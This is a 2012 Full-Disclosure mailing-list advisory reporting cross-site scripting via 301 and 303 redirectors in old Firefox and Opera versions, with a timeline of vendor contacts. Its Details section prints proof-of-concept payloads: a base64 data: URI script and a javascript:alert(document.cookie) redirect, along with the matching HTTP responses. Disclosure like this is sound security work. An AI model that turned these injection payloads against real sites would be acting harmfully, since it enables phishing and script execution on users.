[<prev] [next>] [day] [month] [year] [list]
Message-ID: <00cf01cd9f3e$398f3e10$9b7a6fd5@ml>
Date: Sun, 30 Sep 2012 22:02:25 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Cross-Site Scripting via redirectors 301 and 303
in different browsers
Hello list!
Here is information about Cross-Site Scripting vulnerabilities via
redirectors with statuses 301 and 303 in different browsers. This is
continuation of my 2009's and 2010's advisories and articles about 302
redirectors, such as article "Cross-Site Scripting attacks via redirectors"
(http://websecurity.com.ua/3386/).
At 16.09.2012 I've found that Mozilla hiddenly fixed two XSS vulnerabilities
via 302 redirectors in browsers Firefox 10.0.7 and Firefox 15.0.1 (about
which I've informed them by e-mail and in Bugzilla and wrote in articles in
2009 and 2010), without any official announcements and referencing on me. As
I've checked in detail in all branches of the browser from 3.0.19 till
15.0.1, in Mozilla Firefox 8.0.1 these XSS were working, and in 9.0.1
already did not, i.e. they were hiddenly fixed in version 9.0.
And that day I've found Cross-Site Scripting vulnerabilities in browsers
Mozilla Firefox and Opera via location header at statuses 301 and 303. The
attacks via other 30x statuses don't work.
-------------------------
Affected products:
-------------------------
Vulnerable are Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and previous
versions. And Opera 10.62 and previous versions. The browsers IE6, IE7, IE8
and Chrome are not affected.
Opera Software fixed (in lame way without referencing on me, which was not
the fist time for them) this hole in Opera 10.63. The fix was for 302
redirectors, which I've wrote about earlier concerning Opera and other
browsers, but it should concerns also 301 and 303 redirectors.
----------
Details:
----------
Cross-Site Scripting (WASC-08):
XSS attacks via location-header redirectors with 301 and 303 statuses.
Attack #1:
Attack is doing by redirecting to data: URI (with or without using of
base64).
With request to script at web site:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Which returns 301 code in the answer:
HTTP/1.1 301 Moved Permanently
Location:
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
Or returns 303 code in the answer:
HTTP/1.1 303 See other
Location:
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
Attack works in Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 ad Opera
10.62. Because in the browsers Firefox and Opera the code is executing not
in context of this site, hence there is no access to cookies. This
vulnerability in browsers can be used for conducting of fishing attacks and
executing of JavaScript code.
Attack #2:
Attack is doing by redirecting to javascript: URI.
With request to script at web site:
http://site/script.php?param=javascript:alert(document.cookie)
Which returns 301 code in the answer:
HTTP/1.1 301 Moved Permanently
Location: javascript:alert(document.cookie)
Or returns 303 code in the answer:
HTTP/1.1 303 See other
Location: javascript:alert(document.cookie)
Attack works in Opera 10.62 (as Strictly social XSS). Because in Opera the
code is executing not in context of this site, hence there is no access to
cookies. This vulnerability in browser can be used for conducting of fishing
attacks and executing of JavaScript code.
------------
Timeline:
------------
2009.03.04 - informed Mozilla about XSS via different charsets and Charset
Remembering vulnerability. Mozilla ignored.
2009.08.28 - informed Mozilla about XSS vulnerability via redirector with
302 status. Mozilla ignored.
2010.08.07 - informed Mozilla about another XSS vulnerability via redirector
with 302 status. Mozilla ignored.
2011.11.08 - Mozilla fixed part of charsets holes in MFSA 2011-47 (after
informing from other researcher).
2011.12.20 - Mozilla hiddenly fixed XSS via 302 redirectors in Firefox 9.0.
2012.04.24 - Mozilla fixed other part of charsets holes in MFSA 2012-24
(after informing from other researcher).
2012.09.16 - found hidden Mozilla fix of 302 redirectors in Firefox 10.0.7
and Firefox 15.0.1. And later found that it was fixed already in 9.0.
2012.09.16 - checked XSS attacks via 301 and 303 redirectors in different
browsers.
2012.09.25 - disclosed at my site (http://websecurity.com.ua/6067/).
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists